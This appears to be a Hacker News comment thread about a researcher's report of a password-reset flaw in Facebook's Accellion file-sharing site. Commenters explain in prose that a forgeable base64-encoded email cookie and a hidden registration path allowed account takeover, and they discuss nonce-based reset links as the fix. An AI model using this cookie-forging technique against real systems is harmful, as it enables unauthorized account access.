"This Version of ionCube was not vulnerable to a possible decryption"
Does he just mean "this version doesn't have a readily available dissassembler yet"? Even if they chose the path of compiling to native code, if you own the box, it can't be that hard to get the code.
I wish he'd gone down this route further. It looks like there's code at the top of the file that "decrypts" (decodes?) the contents of the PHP file. I'd be curious why he felt this wasn't worth reversing.
I'm also curious if there's a way to dump 'disassembled' PHP after it's been loaded into the PHP processor. If it's going through eval() at the end, then shouldn't the plain-text source be available in a string somewhere?
I believe these obfuscators work by forcing you to install a binary-only .so zend extension in php.ini, which intercepts these encoded files. The files themselves should decode to already-halfway-parsed PHP opcodes or so, which is probably injected into the PHP/Zend virtual machine.
Figuring out the encoding scheme is probably a lot of boring disassembly work, which in the end just lets you decode a bunch of PHP opcodes which themselves would take a lot of work to make sense of.
They are using it to make sure the value doesn't interfere with the syntax of HTTP headers, i.e. for escaping, not for encryption. That's exactly what base64 is for. They simply have no encryption at all.
Can email interfere with HTTP headers though? There's no \r\n, ";" or "=" in valid email.
Anyway, I have seen sites where it was used as a security measure. Or so the authors thought I guess. Storing login password in url parameter? Seems safe if it is encoded.. But it was years ago.
It sounds like you confused encoded with encrypted, encoded is no different than plain-text. The encoding is just to get a valid string for the URI (so a password can contain special URI characters) and is instantly reversible.
Did not know that, thanks for pointing that out. In that case the encoding is necessary. On top of that I just found out that even Unicode characters are permitted (RFC 6531).
Exactly. Initially, I was confused by this statement too.
There's nothing wrong w/ base64 encoding; however, one needs to apply it to the correct context like applying it to: hashes, avoid text collision/escaping chars, or just embedding plain old non-sensitive binary data in text.
I don't think you've worked with many 'enterprise' level software products. Enterprise basically means has a salesforce willing to slog through an RFP.
I understand that facebook has other important things to do ,than create their own file sharing service( for internal purpose ), but I can't stop asking this question, why not create their own thing ?
Well you pretty much answered your own question, didn't you?
Surely it is cheaper to buy an off-the-shelf solution, instead of spending a lot of money on wasting engineering time building and supporting a product that is not core to their mission.
I'm confused. This looks like an interesting hack, but I don't understand what's going on here, despite reading the post 4 times and watching the video twice.
What is this "Password Recovery" page? Is this for emailing a person a reset link to a password? Is it for changing your password? What is the cookie used for? What is the flawed logic in the system?
I think the process was that a user was sent a 'forgot password' link. When they clicked the link, they were redirected to `wmPassupdate.html` with the cookie `referer={base64(email)}` set. Then, when users submit the password update form, the `referer` cookie is used to authenticate them, but it can be trivially generated.
tptacek will be shortly along to explain how password reset links are typical and one of the most common mistakes.
How you should just "take the hit" (the cost is trivial) and store a randomly generated nounce in your database rather then do shenanigans like encoding user information in the url with secrets and bad cryptography and what not.
Do you have any examples of someone further explaining what you are suggesting? Or if you have time, can you further elaborate on this point? I glanced at the nounce article on wikipedia and if I understand correctly you are suggesting:
1) user creates account (which generates nounce)
2) when password resetting via email auth via nounce.
3) when password is reset regen nounce
Is that right? Just trying to better understand what appears to be a good approach to password resets.
That's basically right. Generally you generate the nonce when someone clicks the 'forgot password' link, but I suppose you could do it when someone creates the account as well.
I'm confused. How exactly is the nonce to be used if without a link?
I was under the impression that best practice was a link with a randomly generated key that has an expiration date (and is expired as soon as it is used). The only security hole here is if the email is intercepted (and you've got other problems at that point).
I realize that key == nonce in my post. My point was against the statement "emailing password reset links is bad and not best practice." You need an password link to make use of the key/nonce. The point of the nonce isn't to eliminate links. It's to make the attack surface that much smaller by limiting their power.
It sounds like the link in the "Password reset" email doesn't use a secret one-time expiring token, but instead base64-encodes the user's email address, so it can trivially be generated by an attacker.
Not just that, but there was a self-help page for self-registering your own account (the first screenshot):
> It seems that Facebook was trying to avoid the creation of accounts in Accellion after removing the register form from the pageview
> I discovered that if you know the direct location of the form (/courier/web/1000@/wmReg.html), You can easily bypass that protection and create an account in files.fb.com,
Once he created his own accounts, he could test out his exploit code on his created accounts.
The last screenshot is a capture of Windows Media Player playing back a desktop video capture session; basically screenshot inception. The author provides no information on timelines, so it's likely that he found this exploit back in March of 2012, but is just releasing the write-up now.
1) Identified a badly protected side entrance to use rather than the front door
2) Painstakingly researched the third party product (similarly one could investigate a third party library used in a bespoke codebase)
3) Figured out the adaptations the target organisation had made to it and guessed some mistakes they'd made
4) Eventually hit on a cookie modification attack made possible by limitations found in that publicly-available codebase.
Smart.